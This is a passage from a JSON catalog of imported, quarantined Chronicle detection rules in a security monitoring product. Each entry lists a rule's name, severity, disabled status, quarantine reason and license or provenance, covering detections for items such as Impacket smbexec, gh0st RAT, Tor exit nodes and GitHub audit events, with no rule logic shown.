"rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/fireeye_red_team_tool___g2js_suspicious_process_tree.yaral" } }, { "id": "chronicle-detection-rules-fireeye-red-team-tool-modified-impacket-smbexec-via-cmdline", "type": "detection", "name": "fireeye_red_team_tool__modified_impacket_smbexec_via_cmdline", "description": "fireeye_red_team_tool__modified_impacket_smbexec_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/fireeye-red-team-tool-modified-impacket-smbexec-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "fireeye_red_team_tool__modified_impacket_smbexec_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/fireeye_red_team_tool___modified_impacket_smbexec__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-fireeye-red-team-tool-modified-impacket-smbexec-via-registry", "type": "detection", "name": "fireeye_red_team_tool__modified_impacket_smbexec_via_registry", "description": "fireeye_red_team_tool__modified_impacket_smbexec_via_registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/fireeye-red-team-tool-modified-impacket-smbexec-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "fireeye_red_team_tool__modified_impacket_smbexec_via_registry", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/registry_event/fireeye_red_team_tool___modified_impacket_smbexec__via_registry.yaral" } }, { "id": "chronicle-detection-rules-fireeye-red-team-tool-modified-impacket-wmiexec-via-cmdline", "type": "detection", "name": "fireeye_red_team_tool__modified_impacket_wmiexec_via_cmdline", "description": "fireeye_red_team_tool__modified_impacket_wmiexec_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/fireeye-red-team-tool-modified-impacket-wmiexec-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "fireeye_red_team_tool__modified_impacket_wmiexec_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/fireeye_red_team_tool___modified_impacket_wmiexec__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-flash-player-update-from-suspicious-location", "type": "detection", "name": "flash_player_update_from_suspicious_location", "description": "flash_player_update_from_suspicious_location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/flash-player-update-from-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "flash_player_update_from_suspicious_location", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/flash_player_update_from_suspicious_location.yaral" } }, { "id": "chronicle-detection-rules-flawedammyy-rat-detection-proxy", "type": "detection", "name": "flawedammyy_rat_detection_proxy", "description": "flawedammyy_rat_detection_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/flawedammyy-rat-detection-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "flawedammyy_rat_detection_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/flawedammyy_rat_detection__proxy.yaral" } }, { "id": "chronicle-detection-rules-flowerpippi-malware-detector-sysmon-behavior", "type": "detection", "name": "flowerpippi_malware_detector_sysmon_behavior", "description": "flowerpippi_malware_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/flowerpippi-malware-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "flowerpippi_malware_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/flowerpippi_malware_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-formbook-malware-sysmon", "type": "detection", "name": "formbook_malware_sysmon", "description": "formbook_malware_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/formbook-malware-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "formbook_malware_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/formbook_malware__sysmon.yaral" } }, { "id": "chronicle-detection-rules-gcp-identity-low-and-medium-severity-alert-escalation", "type": "detection", "name": "gcp_identity_low_and_medium_severity_alert_escalation", "description": "gcp_identity_low_and_medium_severity_alert_escalation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/gcp-identity-low-and-medium-severity-alert-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "gcp_identity_low_and_medium_severity_alert_escalation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/gcp/gcp_identity_low_and_medium_severity_alert_escalation.yaral" } }, { "id": "chronicle-detection-rules-gcp-kms-decryption-by-unexpected-service-account", "type": "detection", "name": "gcp_kms_decryption_by_unexpected_service_account", "description": "gcp_kms_decryption_by_unexpected_service_account", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/gcp-kms-decryption-by-unexpected-service-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "gcp_kms_decryption_by_unexpected_service_account", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/gcp/gcp_kms_decryption_by_unexpected_service_account.yaral" } }, { "id": "chronicle-detection-rules-gcp-multiple-hmac-keys-deleted", "type": "detection", "name": "gcp_multiple_hmac_keys_deleted", "description": "gcp_multiple_hmac_keys_deleted", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/gcp-multiple-hmac-keys-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "gcp_multiple_hmac_keys_deleted", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/gcp/gcp_multiple_hmac_keys_deleted.yaral" } }, { "id": "chronicle-detection-rules-gcp-unauthorized-gke-pod-token-endpoint-usage", "type": "detection", "name": "gcp_unauthorized_gke_pod_token_endpoint_usage", "description": "gcp_unauthorized_gke_pod_token_endpoint_usage", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/gcp-unauthorized-gke-pod-token-endpoint-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "gcp_unauthorized_gke_pod_token_endpoint_usage", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/gcp/gcp_unauthorized_gke_pod_token_endpoint_usage.yaral" } }, { "id": "chronicle-detection-rules-gcti-benign-binaries-contacts-tor-exit-node", "type": "detection", "name": "gcti_benign_binaries_contacts_tor_exit_node", "description": "gcti_benign_binaries_contacts_tor_exit_node", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/gcti-benign-binaries-contacts-tor-exit-node.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "gcti_benign_binaries_contacts_tor_exit_node", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/gcti_benign_binaries_contacts_tor_exit_node.yaral" } }, { "id": "chronicle-detection-rules-gcti-remote-access-tools", "type": "detection", "name": "gcti_remote_access_tools", "description": "gcti_remote_access_tools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/gcti-remote-access-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "gcti_remote_access_tools", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/gcti_remote_access_tools.yaral" } }, { "id": "chronicle-detection-rules-gcti-tor-exit-nodes", "type": "detection", "name": "gcti_tor_exit_nodes", "description": "gcti_tor_exit_nodes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/gcti-tor-exit-nodes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "gcti_tor_exit_nodes", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/gcti_tor_exit_nodes.yaral" } }, { "id": "chronicle-detection-rules-gelup-malware-detector-sysmon-behavior", "type": "detection", "name": "gelup_malware_detector_sysmon_behavior", "description": "gelup_malware_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/gelup-malware-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "gelup_malware_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/gelup_malware_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-geoip-user-login-from-multiple-states-or-countries", "type": "detection", "name": "geoip_user_login_from_multiple_states_or_countries", "description": "geoip_user_login_from_multiple_states_or_countries", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/geoip-user-login-from-multiple-states-or-countries.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "geoip_user_login_from_multiple_states_or_countries", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/authentication/geoip_user_login_from_multiple_states_or_countries.yaral" } }, { "id": "chronicle-detection-rules-gh0strat-malware-detector-sysmon-behavior-july-2019", "type": "detection", "name": "gh0strat_malware_detector_sysmon_behavior_july_2019", "description": "gh0strat_malware_detector_sysmon_behavior_july_2019", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/gh0strat-malware-detector-sysmon-behavior-july-2019.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "gh0strat_malware_detector_sysmon_behavior_july_2019", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/gh0strat_malware_detector__sysmon_behavior___july_2019.yaral" } }, { "id": "chronicle-detection-rules-github-access-granted-to-personal-access-token-followed-by-high-number-of-cloned", "type": "detection", "name": "github_access_granted_to_personal_access_token_followed_by_high_number_of_cloned_non_public_repositories", "description": "github_access_granted_to_personal_access_token_followed_by_high_number_of_cloned_non_public_repositories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-access-granted-to-personal-access-token-followed-by-high-number-of-cloned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_access_granted_to_personal_access_token_followed_by_high_number_of_cloned_non_public_repositories", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_access_granted_to_personal_access_token_followed_by_high_number_of_cloned_non_public_repositories.yaral" } }, { "id": "chronicle-detection-rules-github-application-installed", "type": "detection", "name": "github_application_installed", "description": "github_application_installed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-application-installed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_application_installed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_application_installed.yaral" } }, { "id": "chronicle-detection-rules-github-dependabot-vulnerability-alerts-disabled", "type": "detection", "name": "github_dependabot_vulnerability_alerts_disabled", "description": "github_dependabot_vulnerability_alerts_disabled", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-dependabot-vulnerability-alerts-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_dependabot_vulnerability_alerts_disabled", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_dependabot_vulnerability_alerts_disabled.yaral" } }, { "id": "chronicle-detection-rules-github-enterprise-audit-log-stream-destroyed", "type": "detection", "name": "github_enterprise_audit_log_stream_destroyed", "description": "github_enterprise_audit_log_stream_destroyed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-enterprise-audit-log-stream-destroyed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_enterprise_audit_log_stream_destroyed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_enterprise_audit_log_stream_destroyed.yaral" } }, { "id": "chronicle-detection-rules-github-enterprise-audit-log-stream-modified", "type": "detection", "name": "github_enterprise_audit_log_stream_modified", "description": "github_enterprise_audit_log_stream_modified", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-enterprise-audit-log-stream-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_enterprise_audit_log_stream_modified", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_enterprise_audit_log_stream_modified.yaral" } }, { "id": "chronicle-detection-rules-github-enterprise-deleted", "type": "detection", "name": "github_enterprise_deleted", "description": "github_enterprise_deleted", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-enterprise-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_enterprise_deleted", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_enterprise_deleted.yaral" } }, { "id": "chronicle-detection-rules-github-enterprise-or-organization-recovery-codes-activity", "type": "detection", "name": "github_enterprise_or_organization_recovery_codes_activity", "description": "github_enterprise_or_organization_recovery_codes_activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-enterprise-or-organization-recovery-codes-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_enterprise_or_organization_recovery_codes_activity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_enterprise_or_organization_recovery_codes_activity.yaral" } }, { "id": "chronicle-detection-rules-github-high-number-of-non-public-github-repositories-cloned", "type": "detection", "name": "github_high_number_of_non_public_github_repositories_cloned", "description": "github_high_number_of_non_public_github_repositories_cloned", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-high-number-of-non-public-github-repositories-cloned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_high_number_of_non_public_github_repositories_cloned", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_high_number_of_non_public_github_repositories_cloned.yaral" } }, { "id": "chronicle-detection-rules-github-high-number-of-non-public-github-repositories-downloaded", "type": "detection", "name": "github_high_number_of_non_public_github_repositories_downloaded", "description": "github_high_number_of_non_public_github_repositories_downloaded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-high-number-of-non-public-github-repositories-downloaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_high_number_of_non_public_github_repositories_downloaded", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_high_number_of_non_public_github_repositories_downloaded.yaral" } }, { "id": "chronicle-detection-rules-github-invitation-sent-to-non-company-email-domain", "type": "detection", "name": "github_invitation_sent_to_non_company_email_domain", "description": "github_invitation_sent_to_non_company_email_domain", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-invitation-sent-to-non-company-email-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_invitation_sent_to_non_company_email_domain", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_invitation_sent_to_non_company_email_domain.yaral" } }, { "id": "chronicle-detection-rules-github-oauth-application-access-restrictions-disabled", "type": "detection", "name": "github_oauth_application_access_restrictions_disabled", "description": "github_oauth_application_access_restrictions_disabled", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-oauth-application-access-restrictions-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_oauth_application_access_restrictions_disabled", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_oauth_application_access_restrictions_disabled.yaral" } }, { "id": "chronicle-detection-rules-github-organization-removed-from-enterprise", "type": "detection", "name": "github_organization_removed_from_enterprise", "description": "github_organization_removed_from_enterprise", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-organization-removed-from-enterprise.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_organization_removed_from_enterprise", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_organization_removed_from_enterprise.yaral" } }, { "id": "chronicle-detection-rules-github-outgoing-organization-transfer-initiated", "type": "detection", "name": "github_outgoing_organization_transfer_initiated", "description": "github_outgoing_organization_transfer_initiated", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-outgoing-organization-transfer-initiated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_outgoing_organization_transfer_initiated", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_outgoing_organization_transfer_initiated.yaral" } }, { "id": "chronicle-detection-rules-github-outgoing-repository-transfer-initiated", "type": "detection", "name": "github_outgoing_repository_transfer_initiated", "description": "github_outgoing_repository_transfer_initiated", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-outgoing-repository-transfer-initiated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_outgoing_repository_transfer_initiated", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_outgoing_repository_transfer_initiated.yaral" } }, { "id": "chronicle-detection-rules-github-personal-access-token-auto-approve-policy-modified", "type": "detection", "name": "github_personal_access_token_auto_approve_policy_modified", "description": "github_personal_access_token_auto_approve_policy_modified", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/github-personal-access-token-auto-approve-policy-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "github_personal_access_token_auto_approve_policy_modified", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/github/github_personal_access_token_auto_approve_policy_modified.yaral" } }, { "id": "chronicle-detection-rules-github-personal-access-token-created-from-tor-ip-address", "type": "detection", "name": "github_personal_access_token_created_from_tor_ip_address", "description": "github_personal_access_token_created_from_tor_ip_address", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 